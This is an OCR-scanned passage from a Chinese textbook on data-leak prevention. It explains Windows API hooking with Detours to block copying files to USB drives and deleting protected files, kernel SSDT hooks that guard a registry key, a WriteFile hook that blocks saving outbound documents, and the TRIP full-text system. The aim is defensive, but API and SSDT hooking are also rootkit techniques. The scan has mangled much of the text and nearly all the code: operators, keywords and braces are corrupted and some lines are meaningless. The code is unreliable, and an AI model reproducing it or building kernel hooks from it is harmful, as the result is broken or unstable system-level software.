o 应 用 程序 虚拟 化 (Application Virtualization)， 包 括 仿真 、 模 拟 、 解 释 技术 等 。 

人 们 通常 所 说 的 虚拟 化 主要 是 指 平台 虚拟 化 ， 这 是 一 种 针对 计算 机 和 操作 系统 的 虚拟 
化 技术 ， 通 过 使 用 控制 程序 (Control Program， 也 被 称 为 Virtual Machine Monitor 或 
HypervisoD)， 隐 藏 特定 计算 平台 的 实际 物理 特性 ， 为 用 户 提供 抽象 的 、 统 一 的 、 模 拟 的 计 
算 环 境 (也 被 称 为 虚拟 机 )。 虚 拟 机 中 运行 的 操作 系统 被 称 为 客户 机 操作 系统 (Guest OS), ië 
行 虚拟 机 监控 器 的 操作 系统 ( 某 些 虚拟 机 监控 器 可 以 直接 运行 在 硬件 ) 被 称 为 主机 操作 系统 
(Host OS)。 

平台 虚拟 化 又 可 细 分 为 如 下 几 个子 类 : 

e 全 虚拟 化 (Full Virtualization) 

° 超 虚 拟 化 (Paravirtualization) 

° 硬件 辅助 虚拟 化 (Hardware-Assisted Virtualization) 
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° 操作 系统 级 虚拟 化 (Operating System Level Virtualization) 

这 种 分 类 并 不 是 绝对 的 ， 一 个 优秀 的 虚拟 化 软件 往往 融合 了 多 项 技术 。 例 如 VMware 
Workstation 是 一 个 著名 的 全 虚拟 化 的 VMM, 但 是 它 使 用 了 称 为 动态 二 进 制 翻译 的 技术 把 
对 特权 状态 的 访问 变换 成 对 影子 状态 的 操作 , 从 而 避免 了 低 效 的 Trap-And-Emulate 的 处 理 
方式 ， 这 与 超 虚 拟 化 相似 ， 只 不 过 超 虚拟 化 是 动态 地 修改 程序 代码 。 对 于 超 虚 拟 化 而 言 ， 
如 果 能 利用 硬件 特性 ， 那 么 虚拟 机 的 管理 将 会 大 大 简化 ， 同 时 还 能 保持 较 高 的 性 能 。 

虚拟 化 主要 还 是 通过 文件 过 滤 驱 动 、 磁 盘 驱 动 和 HOOK 技术 实现 。 


5.3.3 ”钩子 技术 应 用 于 防 外 泄 


HJF (Hook) Windows 消息 处 理 机 制 的 一 个 平台 ， 应 用 程序 可 以 在 上 面 设置 子 程序 ， 
以 监听 指定 窗口 的 某 种 消息 ， 而 且 所 监听 的 窗口 可 以 是 由 其 他 进程 所 创建 的 。 当 消息 到 达 
后 ， 在 目标 窗口 处 理 函数 之 前 处 理 它 。 钩 子 机 制 允许 应 用 程序 截获 处 理 Window 消息 或 特 
定 事件 。 

钩子 实际 上 是 一 个 处 理 消 息 的 程序 段 ， 通 过 系统 调用 ， 把 它 挂 入 系统 。 每 当 特定 的 消 
息 发 出 , 在 没有 到 达 目 的 窗口 前 ， 钧 子 程序 就 先 捕获 该 消息 , 亦 即 钩子 函数 先 得 到 控制 权 。 
这 时 钩子 函数 即 可 以 加 工 处 理 (改变 ) 该 消息 ， 也 可 以 不 作 处 理 而 继续 传递 该 消息 ， 还 可 以 
强制 结束 消息 的 传递 。 每 个 Hook 都 有 一 个 与 之 相关 的 指针 列表 ， 称 之 为 钩子 链表 ， 它 由 
系统 来 维护 ， 这 个 链表 的 指针 指向 由 程序 指定 的 回调 函数 ， 当 消息 来 到 时 ， 就 会 调用 这 个 
回调 函数 。 这 些 回 调 函 数 被 称 为 钩子 函数 。 一 些 HOOK 子 程 只 监听 消息 ， 或 者 修改 消息 ， 
或 者 停止 消息 前 进 ， 防 止 这 些 消息 传递 到 下 一 个 HOOK 子 程 或 者 目标 窗口 。 

最 近 安 装 的 钩子 安装 在 链表 最 前 面 ， 最 早 安装 的 放 在 链表 的 最 后 面 ， 也 就 是 说 ， 后 加 
入 链表 的 钩子 会 先 获得 控制 权 。Windows 并 不 要 求 卸 载 钩子 的 顺序 与 安装 的 顺序 相反 。 当 
一 个 钩子 被 卸载 时 ，Windows 便 释 放 这 个 钩子 所 占 的 内 存 ， 并 更 新 整个 HOOK 链表 。 

如 果 安 装 了 钩子 ， 但 在 印 载 它 之 前 就 结束 了 ， 那 么 操作 系统 会 自动 将 其 所 占 内 存 释 放 。 

使 用 API SetWindowsHookEx 将 应 用 程序 定义 的 钩子 安装 到 钩子 链表 中 。 
SetWIndowsHookEx 总 是 在 HOOK 链表 开头 安装 HOOK 子 程 。 当 指定 的 HOOK 消息 发 生 
时 ， 系 统 就 会 调用 与 这 个 HOOK 相关 联 的 HOOK 链表 开头 的 HOOK 子 程 。 每 一 个 HOOK 
链 中 的 子 程 都 可 以 决定 将 这 个 消息 是 否 传递 到 下 一 个 子 程 ， 如 果 要 将 这 个 消息 传递 到 下 一 
个 子 程 ， 就 要 调用 CallNextHookEx 函数 。 

常用 的 挂钩 API 方法 有 两 种 ， 分 别 为 改写 IAT 导入 表 法 和 改写 内 存 地 址 JMP 法 。 

修改 可 执行 文件 的 LAT. 表 ( 即 输入 表 ), 因为 在 该 表 中 记录 了 所 有 调用 API 的 函数 地 址 
则 只 需 将 这 些 地 址 改 为 自己 函数 的 地 址 即 可 , 但 是 这 样 有 一 个 局 限 , 因为 有 的 程序 会 加 壳 ， 
这 样 会 隐藏 真实 的 IAT 表 ， 从 而 使 该 方法 失效 。 

直接 跳 转 ， 改 变 API 函数 的 入 口 或 出 口 的 几 个 字 节 ， 使 程序 跳 转 到 自己 的 函数 ， 该 方 
法 不 受 程序 加 壳 的 限制 。 这 种 技术 ， 说 起 来 也 不 复杂 ， 就 是 改变 程序 流程 的 技术 。 在 CPU 
的 指令 里 ， 有 几 条 指令 可 以 改变 程序 的 流程 ， 如 IMP, CALL. INT. RET. RETF, IRET 
等 指令 。 理 论 上 只 要 改变 API 入 口 和 出 口 的 任何 机 器 码 ， 都 可 以 HOOK。 
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在 防止 外 泄 时 ， 可 能 要 禁止 拷贝 和 禁止 打印 ， 这 时 要 挂钩 与 拷贝 和 打印 相关 的 函数 。 

Detours 类 似 HOOK 的 面向 对 象 程序 设计 ， 现 在 来 实现 防止 硬盘 上 的 文件 拷贝 或 移动 
到 非 硬 盘 (USB fit. 光盘 等 ), 这 里 要 HOOK 这 几 个 函数 : CreateFileA、CreateFileW、MoveFileA、 
MoveFileW、 CopyFileA, CopyFileW, SHFileOperationA 和 SHFileOperationW . 

为 了 简化 操作 ， 把 前 两 个 函数 暂 不 考虑 。 算 法 是 这 样 的 : HOOK 这 些 函 数 后 ， 分 析 其 
源 文件 路 径 、 和 目的 路 径 。 如 果 源 路 径 是 硬盘 ， 而 目的 路 径 不 是 硬盘 ， 则 禁止 。 判 断 盘 符 
属性 使 用 函数 GetDriveType。 程 序 分 为 HOOK 库 文件 部 分 和 应 用 程序 部 分 ， 应 用 程序 给 
HOOK 库 文件 发 命令 。 完 整 的 程序 见 “HOOKAPI 防止 外 泄 ”。 

从 网 上 下 载 的 是 DetoursExpressmsi， 安 装 该 文件 ; 将 SRC 文件 (在 **/Microsoft 
Research/Detours Express 2.1/src 下 ) 复 制 到 VS2008 的 C:\Program Files\Microsoft Visual Studio 
9.0WC F; 然后 在 控制 台 下 运行 C:\Program Files\Microsoft Visual Studio 9.0\VC\bin\vevars 
32.bat; 进入 控制 台 的 C:\Program Files\Microsoft Visual Studio 9.0\VC\sre 运行 NMAKE দি 
S, 生成 了 库 文件 ,在 C:\Program Files\Microsoft Visual Studio 9.0VCVib, 1j 3 个 文件 分 别 
为 detoured.lib、detours.lib、detours.pdb。 


1. 库 文件 部 分 主要 代码 


DETOUR TRAMPOLINE(int WINAPI Real SHFileOperationA(LPSHFILEOPSTRUCT 
IpFileOp).SHFileOperationA): —//detours 要 求 如 此 定义 
BOOL WINAPI Mine SHFileOperationA(LPSHFILEOPSTRUCT IpFileOp) 
{ 
if(lpFileOp->wFunc==FO_COPY || lpFileOp->wFunc—FO_MOVE){ 
char pname[260]={0}: 
char fname[260]={0}: 
strcpy_s(fname.(char*)lpFileOp->pTo): /获取 目的 路 径 
strcpy_s(pname.(char*)lpFileOp->pFrom): /获取 源 路 径 
_Strupr_s(pname): 
_strupr_s(fname); 
//USB 之 间 可 以 复制 ， 硬 盘 到 USB 盘 不 允许 
fname[3]-0: 
pname[3]-0: 
if(fname[0]»—A' && fname[0]-—Z) ( 
UINT n= GetDriveType(fname): 。”// 取 盘 符 属性 
UINT l= GetDriveType(pname): // 取 盘 符 属性 
if(nt-DRIVE FIXED && I—DRIVE FIXED)return FALSE: 
// 源 文件 是 硬盘 的 ， 目 的 文件 不 是 去 硬盘 ， 直 接 返 回 
} 
} 
//MessageBoxA(NULL.IpFileOp->pFrom.IpFileOp->pTo.IDOK): 
int rev = Real SHFileOperationA(IpFileOp): 
return rev; 


) 
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DETOUR TRAMPOLINE(nt WINAPI Real SHFileOperationW(LPSHFILEOPSTRUCTW 


lpFileOp).SHFileOperationW): 
BOOL WINAPIMine SHFileOperationW(LPSHFILEOPSTRUCTW IpFileOp) 
{ 
这 lpFileOp->wFunc 一 FO_COPY || lpFileOp->wFunc—FO_MOVE){ 
wchar t pname[260]- (0) : 
wchar t fname[260]- (0] : 
wescpy s(fname.(wchar t*)IpFileOp-^pTo): 
wescpy s(pname.(wchar t*)lpFileOp-^pFrom): 
 Wcsupr s(pname). 
 wcsupr s(fname): 
/USB 之 间 可 以 复制 ， 硬 盘 到 USB 盘 不 允许 
fname[3]-0: 
pname[3]-0: 
if(fname[0]-—A' && fname[0]-—Z^)( 
UINT n= GetDriveTypeW(fname); 
UINT l= GetDriveTypeW(pname): 
if(n!-DRIVE FIXED && I—DRIVE FIXED)return FALSE: 


) 
//MessageBoxW(NULL.IpFileOp->pFrom.IpFileOp->pTo.IDOK): 
int rev = Real SHFileOperationW(lpFileOp): 


Teturn rev: 
) 
2. 应 用 程序 主要 代码 
typedef void (*InstallHook)0: /定义 开始 HOOK 函数 指针 
typedef void (*UninstallHook)0: /定义 停止 HOOK 函数 指针 


void C 禁止 拷贝 HOOKDlg::OnBnClickedButton10 
í 
InstallHook pInstallHook: 
HMODULE hdll lib —:LoadLibraryEx("Hook.dll" .NULL.0): 
if(hdll lib 一 0){ 
MessageBox(" 失 败 "): 
return; 
H 
pInstallHook-(InstallHook)GetProcAddress(hdll. lib, "InstallHook"); 


if(pInstallHook—-0) { 
MessageBox(" 失 败 2"): 

return: 

) 

pInstallHook(: /开始 HOOK 


FreeLibrary(hdll lib): 
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void C 禁止 拷贝 HOOKDIg::OnBnClickedButton2() 

{ 

UninstallHook pUninstallHook: 
HMODULE hdll lib =::LoadLibraryEx("Hook.dll".NULL.0); 
PpUninstallHook=(UninstallHook)GetProcAddress(hdll lib, "UninstallHook"); 
pUninstallHook(): /停止 HOOK 
FreeLibrary(hdll lib): 

) 


程序 运行 界面 如 图 5-7 所 示 。 


禁止 拷贝 HDOK exe | 禁止 拷贝 HDOK pdb 
TODO: b bug Da. 
due QU a] 


৮1৭ 


开始 禁止 可 以 进行 


图 5-7 演示 文件 防 拷贝 


5.3.4 ”关键 文件 的 防止 删除 


计算 机 安装 的 重要 文件 可 能 需要 防止 使 用 者 删除 。 防 止 文件 的 删除 可 以 通过 API 的 
HOOK 或 文件 过 滤 驱 动 中 的 过 滤 来 防止 。 以 API 方式 为 例 ， 使 用 一 般 HOOK 函数 
SHFileOperation。 下 面 的 代码 是 使 用 DETOURS 实现 的 方式 。 

DETOUR TRAMPOLINE(int WINAPI Real SHFileOperationW 
(LPSHFILEOPSTRUCTW IpFileOp).SHFileOperationW); 
int WINAPI Mine SHFileOperationW(LPSHFILEOPSTRUCTW IpFileOp) 
{ 
if(lpFileOp->wFunc==FO_RENAME | IpFileOp->wFunc==FO_DELETE 
lipFileOp->wFunc 一 FO_COPY){ /禁止 被 删除 ， 被 复制 ， 被 重 命名 
wchar t fname[260]- (0] : 
wcscpy s(fname.(wchar t*)IpFileOp-^pFrom): 
 wcsupr s(fname): /字符 串 变 大 写 
这 wecsstrpnameL"C:\WAAALTXT">0){ /保护 该 文件 
MessageBoxW(0.fname.L"ww 禁止 "IDOR): 
reum 0: /直接 返回 
) 
int rev = Real SHFileOperationW(lpFileOp): /不 是 受 保护 文件 ， 调 用 原来 的 函数 
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Teturn rev; 
} 

如 果 要 在 文件 过 滤 驱 动 中 防止 被 删除 ， 则 可 以 使 用 如 下 方法 进行 处 理 。 
PFLT CALLBACK DATA 的 Data->Iopb-> 等 于 IRP MJ SET INFORMATION, Parameters 
的 FileInformationClass 等 于 FileDispositionInformation， 表 示 要 删除 一 个 文件 ， 此 时 ， 被 删 
除 的 文件 名 可 以 用 函数 FltGetFileNameInformation: 


if (Data->Iopb->Parameters. 
SetFileInformation.FileInformationClass = FileDispositionInformation ) 
í 
FileDispositionInfo.DeleteFile = (BOOLEAN) *((PBOOLEAN) plopb-> 
Parameters.SetFileInformation InfoBuffer): /获取 被 删除 的 文件 ， 如 果 是 受 保护 文件 ， 则 设置 为 
FALSE 
) 


5.8.5 ”监控 注册 表 防 止 程序 被 卸载 


使 用 HOOK 内 核 函 数 对 注册 表 的 某 个 键 进 行 控制 ， 使 操作 人 员 不 能 对 其 进行 修改 删 
除 ， 以 达到 保护 作用 。 
对 注册 表 行 进 HOOK 时 的 一 些 声明 及 结构 如 下 : 
typedef struct_SRVTABLE ( 


PVOID *ServiceTable; 
ULONG LowCall; 
ULONG HiCall: 
PVOID *ArgTable: 

) SRVTABLE, *PSRVTABLE: 

#if defined( ALPHA ) 


#define SYSCALL( function) ServiceTable-»ServiceTable[ (*(PULONG) 
function) & Ox0000FFFF ] 

flelse 

#define SYSCALL( function) ServiceTable-»ServiceTable[ *'PULONG) 
((PUCHAR) function-1)] 


#endif 
PSRVTABLE ServiceTable; 
extern PSRVTABLE KeServiceDescriptorTable: 
BOOLEAN RegHooked = FALSE: 
VOID HookRegistry( void ) 
t 

这 !RegHooked ) í 


// Hook 

RealRegDeleteKey = SYSCALL( ZwDeleteKey ): 
SYSCALL( ZwDeleteKey ) = (PVOID) HookRegDeleteKey: 
RealRegSetValueKey = SYSCALL( ZwSetValueKey ): 
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SYSCALL( ZwSetValueKey ) = (PVOID) HookRegSetValueKey: 
RealRegDeleteValueKey = SYSCALL( ZwDeleteValueKey ): 
SYSCALL( ZwDeleteValueKey ) = (PVOID) HookRegDeleteValueKey: 
RegHooked = TRUE: 


) 
在 需要 HOOK 的 时 候 调 用 此 函数 即 可 达到 效果 。 
下 面 是 反 注册 ， 需 要 停止 对 指定 键 的 控制 时 可 以 调用 此 函数 。 


VOID UnhookRegistry( ) 
{ 
if( RegHooked ) í 

/ 
// Unhook 
/ 
SYSCALL( ZwDeleteKey ) = (PVOID) RealRegDeleteKey; 
SYSCALL( ZwSetValueKey ) = (PVOID) RealRegSetValueKey: 
SYSCALL( ZwDeleteValueKey ) = (PVOID) RealRegDeleteValueKey: 
RegHooked = FALSE; 


) 
本 例子 中 保护 的 指定 键 为 虚拟 磁盘 驱动 的 注册 表 键 。 各 个 功能 函数 的 实现 如 下 。 
1. 控制 删除 某 键 下 的 值 


NTSTATUS HookRegDeleteValueKey( IN HANDLE Handle, PUNICODE STRING Name ) 
t 

PVOID pKey: 

PUNICODE STRING — pUniName; 

UNICODE STRING ustrReg: 

ULONG nRet: 

ObReferenceObjectByHandle(Handle, 0. 0, KernelMode, &pKey, NULL): 

pUniName = ExAllocatePool(NonPagedPool, 1024): 

ObQueryNameString(pKey, pUniName, 1024, &nRet); 


RtlInitUnicodeString(&ustrReg. 
L'WREGISTRYWMACHINENSYSTEM Controlsetü00TWServices RRamdisk"): 
DbgPrint("^6S'n".pUniName-^Buffer): 
if (RtlCompareUnicodeString(pUniName, &ustrReg. TRUE) = 0) 
t 
ExFreePool(pUniName): 
ObDereferenceObject(pKey): 


return STATUS ACCESS DENIED: 
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return (*RealRegDeleteValueKey )(Handle, Name ): 
) 


2. 控制 修改 注册 表 项 


NTSTATUS HookRegSetValueKey( IN HANDLE KeyHandle, IN PUNICODE STRING 
ValueName.IN ULONG TitleIndex, IN ULONG Type. IN PVOID Data, IN ULONG DataSize ) 

t 

PVOID pKey: 

PUNICODE STRING  pUniName: 

UNICODE STRING ustrReg: 

ULONG nRet; 

ObReferenceObjectByHandle(KeyHandle, 0. 0, KernelMode, &pKey, NULL): 

pUniName = ExAllocatePool(NonPagedPool, 1024): 

ObQueryNameString(pKey, pUniName, 1024, &nRet); 


RtlInitUnicodeString(&ustrReg, 
L'WREGISTRYWMACHINENSYSTEM" Controlset001 Services RRamdisk"): 


if (RtICompareUnicodeString(pUniName, &ustrReg, TRUE) = 0) 
t 

ExFreePool(pUniName): 

ObDereferenceObject(pKey): 


retum STATUS ACCESS DENIED: 
) 
retum (*RealRegSetValueKey)(KeyHandle.ValueName.TitleIndex,Type.Data.DataSize): 
) 


3. 控制 删除 某 键 


NTSTATUS HookRegDeleteKey( IN HANDLE Handle ) 

t 

PVOID pKey: 

PUNICODE STRING . pUniName: 

UNICODE STRING ustrReg: 

ULONG nRet; 

ObReferenceObjectByHandle(Handle, 0. 0, KernelMode, &pKey. NULL): 

pUniName = ExAllocatePool(NonPagedPool. 1024): 

ObQueryNameString(pKey. pUniName, 1024, &nRet): 

RtlInitUnicodeString(&ustrReg. 
L"WREGISTRYWMACHINENSYSTEM Controlset001 WServicesRRamdisk"): 

if (RtlCompareUnicodeString(pUniName, &ustrReg, TRUE) = 0) 

t 
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ExFreePool(pUniName): 
ObDereferenceObject(pKey): 
retum STATUS. ACCESS. DENIED; 
) 
return (*RealRegDeleteKey)(Handle): 
) 


以 上 为 主要 的 功能 函数 ， 通 过 这 些 函 数 可 以 拦截 对 指定 路 径 注册 表 的 操作 。 
5.8.6 ”外 发 文件 管理 


外 发 文件 管理 主要 是 防止 相关 业务 单位 对 文档 的 泄密 。 比 如 ， 某 公司 的 一 个 艺术 创意 
画 ， 用 户 买 下 之 前 肯定 要 先 看 。 还 需要 让 用 户 看 几 次 并 做 一 些 修改 。 如 果 发 给 用 户 ， 用 户 
可 能 直接 留 下 不 肯 付 费 了 。 外 发 文件 的 管理 就 是 要 达到 将 某 些 文档 发 给 用 户 后 能 控制 用 户 
看 几 次 ， 或 看 到 哪 一 天 几 点 几 分 为 止 ， 或 只 能 允许 用 户 在 指定 的 机 器 上 看 ， 能 禁止 用 户 找 
贝 、 录 像 和 另存 。 

外 发 文件 保护 的 一 种 方式 是 将 文档 ( 非 声 像 文 件 ) 转 换 为 光栅 格式 ， 然 后 加 密 后 和 一 个 
浏览 程序 捆绑 在 一 起 ， 发 给 用 户 。 外 发 的 限制 条 件 也 写 在 浏览 程序 中 。 这 样 的 好 处 是 不 需 
要 在 用 户 的 机 器 中 安装 专门 的 浏览 工具 ， 控 制 起 来 比较 简单 。 不 足 之 处 是 ， 转 换 为 光栅 数 
据 需 要 虚拟 打印 机 的 支持 。 转 换 为 光栅 后 , 会 破坏 原来 文件 的 属性 , 文件 质量 可 能 会 变 差 。 

另 一 种 方式 是 不 改变 文件 格式 ， 如 Word， 附 加 保护 条 件 ， 压 缩 加 密 后 发 给 用 户 。 用 
户 端 必须 安装 特定 的 浏览 软件 。 浏 览 软件 解密 并 根据 附加 的 保护 条 件 决定 是 否 打开 文件 。 
文件 打开 后 处 于 文件 过 滤 驱 动 的 监控 下 ， 禁 止 用 户 另 在， 处 于 API 钩子 的 监控 下 ， 禁 止 用 
户 编辑 、 保 存 和 录像 。 

这 里 仅 列举 一 个 主要 技术 : 禁止 用 户 用 录像 软件 录像 。 录 像 软件 一 般 生成 exe 文件 ， 
有 的 生成 exw 文件 。 比 较 好 的 办 法 是 HOOK 函数 WriteFile， 在 程序 中 有 写 操作 发 生 时 ， 
取 当 前 写 的 文件 名 ， 如 果 扩 展 名 为 exe 或 exw， 则 禁止 。 

DETOUR TRAMPOLINE(BOOL WINAPI Real WriteFile( HANDLE hFile, LPCVOID 
lpBuffer, DWORD nNumberOfBytesToWrite.LPDWORD 

lpNumberOfBytesWritten.LPOVERLAPPED lpOverlapped).WriteFile):: 

BOOL WINAPI Mine WriteFile( in HANDLE hFile, in LPCVOID lpBuffer, 
in DWORD nNumberOfBytesToWrite, 


. out opt — LPDWORD lIpNumberOfBytesWritten, 
. inout opt LPOVERLAPPED lpOverlapped) 


{ 


wchar t pname[260]- (0) : 
上 # 如 果 要 控制 格式 文件 的 保存 ， 下 面 是 首 数据 
static BYTE docx[8]={0x50.0x4b.0x03,0x04.0x14.0x00.0x06.0x00}://excel2007 也 是 
static BYTE docs[8]=(0xd0.0xcf.0x11.0xe0.0xa1.0xb1.0x1a.0xe1): 
static BYTE pptx[8]- (0x50.0x4b.0x03.0x04.0x14.0x00.0x06.0xe0) - 
static BYTE ppt [8]- (0xdO.Oxcf.0x11.0xe0.0xa1.0xb1.0x1a.0xel] ;//excel2003 也 是 它 
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static BYTE acce[8]- (0x00,0x01.0x00,0x00,0x53.0x74.0x61.0x6e] : 
对 
GetModuleFileNameW(NULL.pname.260): 
_Wcsupr s(pname): /不 放 过 下 面 这 些 如 QQ, QQ 会 崩溃 
if((wcsstr(pname.L"\QQ.EXE")>0) || 
(wesstr(pname.L"\DEVENV.EXE")>0) || 
(wesstr(pname.L'^CL.EXE")»0) || 
(wcsstr(pname.L"\IEXPLORE.EXE")>0) || 
(wcsstr(pname.L"\EXPLORER.EXE")>0) ) 
return Real. WriteFile(hFile.IpBuffer.nNumberOfBytesToWrite.IpNumberOfBytes Written, 
IpOverlapped): 
OutputDebugString W(pname): 
if(!GetFileNameFromHandle(hFile, pname, 260)) í 
OutputDebugStringW(L "error"): 
return Real WriteFile(hFile,IpBuffer.nNumberOfBytesToWrite.IpNumberOfBytesWritten, 
IpOverlapped): 
) 
 Wcsupr s(pname); 
OutputDebugStringW(pname): 
int len-wcslen(pname); 
这 len<S)Real WriteFile(hFile.IpBuffer.nNumberOfBytesToWrite,IpNumberOfBytes Written, 
IpOverlapped): 
wchar t* pd-(wchar t*)(&pname[len-5]): 
static ৮৬০7২  hadExp[]2](  L'DOC". L"DOCX"L"DOCM"L"DOTM'", L".HIM", 
L'HIML'L"WPS", L'WIF' L"XML'" L"RTF", L'MHT" L"MHIL"  L"DOT"L"PPT". 
L"PPTX"L".PPTM"L"POTX", L'.EMF", L'.MHT". L'MHTL"L".WMF", L".BMP", L"TIF", L"PNG" 
L"'JPG", L'GIF" L"PPA"L"PPAM".L".PPS", L".PPSM".L".PPSX".L".THMX" 
L". POT", L'POTM"LL".XLSX"L".XLSM"LL".XLSB"IL".XLS",. L'MHT"IL"MHTML", 
L'HTML"IL".XLTX"L" XLTM"IL".XLT", L".CSV", L"PRN", L".DIF", L".SLK", 
L".XLAM",L".XLA", L".PDF", L".TXT",L".DIB", L" JPEG".L" JPE", L" JFIF".L".TIFF", 
L".EXE", L".EXW", L".WMV", L' AVI"); /浏览 外 发 文件 期 间 禁 止 这 些 文件 保存 
BOOL re- TRUE: 
for(int i-0: i<61; i—)( 
if(wesstr(pd.hadExp[i])*0) ( re TRUE: break: } 


) 

if(re—TRUE) retum FALSE: 

BOOL rev = Real WriteFile(hFile.IpBuffer.nNumberOfBytesToWrite, 
IpNumberOfBytesWritten.IpOverlappe d): 

return rev; 


) 
上 面 的 关键 代码 是 根据 文件 句柄 获取 被 写 入 文件 的 全 路 径 函 数 GetFileNameFrom- 
Handle。 


#define BUFSIZE 512 
BOOL _ stdcall GetFileNameFromHandle(HANDLE hFile, LPWSTR lpFileName, DWORD 
dwSize) 
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BOOL bSuccess = FALSE: 
WCHAR pszFilename[MAX PATH + 1 ]: 


HANDLE hFileMap: 

DWORD dwFileSizeHi = 0: 

DWORD dwFileSizeLo =  :GetFileSize(hFile, & dwFileSizeHi); 

if (dwFileSizeLo = 0  && dwFileSizeHi 一 0)retum bSuccess; 

hFileMap = ::CreateFileMappingW(hFile, NULL.PAGE READONLY, 

0.1 NULL): 

if (hFileMap) 

£ 

void* pMem = ::MapViewOfFile(hFileMap, FILE MAP READ. 0,0, 1 ); 
if (pMem) 

{ 


if (:GetMappedFileNameW(GetCurrentProcess(), 
pMem, szFilenameMAX PATH)) 
í 
WCHAR szTemp[BUFSIZE]: 
szTemp[0] = Lo; 
if (:GetLogicalDriveStringsW(BUFSIZE - 1 , szTemp)) 
{ 
WCHAR szName[MAX PATH]: 
WCHAR szDriv[3] =L" 
BOOL bFound = FALSE; 
WCHAR* p - szTemp: 
do 
{ 
*szDrive = *p; 
if (:QueryDosDeviceW(szDrive, szName, BUFSIZE)) 
{ 
UINTuNameLen = IstrlenW(szName): 
if (uNameLen < MAX PATH) 


{ 
bFound = :: wcsnicmp(pszFilename. szName. 
uNameLen) = 0: 
if (bFound) 


( 

WCHAR szTempFile| MAX PATH]: 
zwsprintfW(szTempFile, L"%s%s", szDrive.pszFilename + uNameLen): 

zIstrepynW(pszFilename, szTempFile, MAX PATH): 

) 

} } 
while (* p++): 
} while (!bFound &&  *p) 
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JN RN 
EET 
মিনির 
: zIstrcpynW(lpFileName.pszFilename.dwSize): 
bSuccess = TRUE: 
টিটি 
) 


下 面 以 一 款 外 发 文件 管理 产品 为 例 ， 描 述 一 下 其 主要 用 途 。 如 图 5-8 所 示 的 是 由 文件 
发 送 者 控制 的 外 发 文件 生成 端 。 如 图 5-9 所 示 的 是 安装 在 用 户 端 上 的 浏览 器 
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5-8 ”外 发 生成 端 


ns xd 
图 5-9 浏览 端 
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54 “ 非 结构 化 数据 管理 与 文件 服务 器 端的 安全 


文件 服务 器 端 除 了 要 防止 黑客 ， 还 要 防止 内 部 人 员 的 亚 意 操作 。 防 止 外 部 侵入 已 经 有 
很 多 成 熟 软 硬件 。 这 里 仅 描 述 非 结 构 化 数据 管理 和 防止 内 部 恶意 操作 的 一 些 措施 。 


1. 非 结构 化 数据 管理 


相对 于 结构 化 数据 (即行 数据 ,存储 在 数据 库 里 , 可 以 用 二 维 表 结构 来 逻辑 表达 实现 的 
数据 ) 而 言 ,不 方便 用 数据 库 二 维 逻 辑 表 来 表现 的 数据 即 称 为 非 结构 化 数据 ,包括 所 有 格式 
的 办 公文 档 、 文 本 、 图 片 、XML、HTML、 各 类 报表 、 图 像 和 音频 /视频 信息 等 。 非 结构 化 
数据 库 是 指 其 字段 长 度 可 变 ， 并 且 每 个 字段 的 记录 又 可 以 由 可 重复 或 不 可 重复 的 子 字段 构 
成 的 数据 库 ， 用 它 不 仅 可 以 处 理 结构 化 数据 (如 数字 、 符 号 等 信息 )， 而 且 更 适合 处 理 非 结 
构 化 数据 (全 文 文本 、 图 像 、 声 音 、 影 视 、 超 媒体 等 信息 )。 

非 结构 化 Web 数据 库 主要 是 针对 非 结构 化 数据 而 产生 的 , 与 以 往 流行 的 关系 数据 库 相 
比 ， 其 最 大 区 别 在 于 它 突破 了 关系 数据 库 结构 定义 不 易 改 变 和 数据 定 长 的 限制 ， 支 持 重复 
字段 、 子 字段 以 及 变 长 字段 并 实现 了 对 变 长 数据 和 重复 字段 进行 处 理 和 数据 项 的 变 长 存储 
管理 , 在 处 理 连续 信息 (包括 全 文 信息 ) 和 非 结构 化 信息 (包括 各 种 多 媒体 信息 ) 中 有 着 传统 关 
系 型 数据 库 所 无 法 比拟 的 优势 。 


2.TRIP 系统 概述 


TRIP 是 专 为 处 理 非 规范 数据 研发 的 软件 系统 ， 源 出 于 瑞典 皇家 工学 院 1972 年 开发 的 
图 书 情报 检索 专用 软件 3RIP。1985 年 瑞典 Paralog 公司 在 3RIP 基础 上 开发 成 为 TRIP 后 ， 
在 图 书 情 报 界外 的 企业 、 公 共 机 关中 间 找 到 了 更 多 的 用 户 。 应 用 最 多 的 领域 是 化 学 、 化 工 
公司 ， 医 药 公 司 ， 政 法 部 门 ， 议 会 ， 海 关 ， 报 业 ， 交 通 ， 电 信 ， 广 播 ， 保 险 等 。 

上 世纪 80 年 代 中 期 ， 中 国 科技 信息 研究 所 在 建设 “国家 科技 情报 检索 系统 中 心 ”时 ， 
与 瑞典 进行 技术 合作 , 修改 内 核 程序 ,于 1987 年 推出 了 中 英文 兼容 的 TRIP 系统 , 并 在 1988 
年 底 率先 实现 了 世界 上 大 型 中 文 文献 全 文 检索 服务 。 此 后 TRIP 为 全 国 科技 情报 界 和 新 华 
社 、 经 济 日 报 等 单位 采用 。1997 年 中 信 所 又 给 TRIP 增加 了 中 文 自动 分 词 倒 排 功能 ， 可 自 
动 切取 最 长 至 10 个 汉字 的 中 文 单字 词 、 多 字 词 或 交叉 歧义 词 为 倒 排 单元 , 明显 提高 了 高 频 
多 字 词 的 检索 速度 及 查 准 率 。 

随 着 计算 机 应 用 和 互联 网 的 普及 , TRIP 系统 所 擅长 于 处 理 的 领域 终于 越 来 越 广 。 TRIP 
系统 商 在 原 有 的 全 文 检索 系统 基础 上 ， 研 发 了 一 系列 新 产品 ， 在 文档 管理 、 内 容 管 理 、 知 
识 管理 以 及 媒体 管理 领域 内 ， 提 供 了 解决 商务 需求 的 非常 先进 的 检索 应 用 技术 。 

TRIP 的 成 功 在 其 独特 的 文件 管理 技术 ，TRIP 软件 由 作为 发 动机 的 内 核 (TRIPbase) 和 
各 种 用 户 接口 组 成 ， 具 有 良好 的 开放 性 ， 易 于 和 其 他 应 用 系统 和 用 户 预 制 软件 合成 。 

TRIP 最 成 功 之 处 在 于 其 装备 了 一 个 采用 倒 排 文件 (Inverted file) 9| COR (1 5] 8€ 
(Engine)， 它 把 每 个 检索 词 通过 散 列 函数 (hash) 生 成 一 个 唯一 码 存在 数据 库 中 。 
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TRIP 的 每 个 数据 库 由 3 个 独立 的 文件 (file) 组 成 : 一 是 存放 原始 数据 的 主 文件 , 二 是 存 
放 主 文件 中 那些 要 被 快速 检索 的 数据 的 倒 排 (inverted) 文 件 ， 三 是 存放 各 种 截断 信息 的 倒 排 
文件 。 这 3 个 文件 合 在 一 起 形成 TRIP 的 一 个 应 用 数据 库 ， 它 们 独立 于 计算 机 的 操作 系统 ， 
这 3 个 文件 可 以 在 不 同 的 操作 系统 下 运行 。 

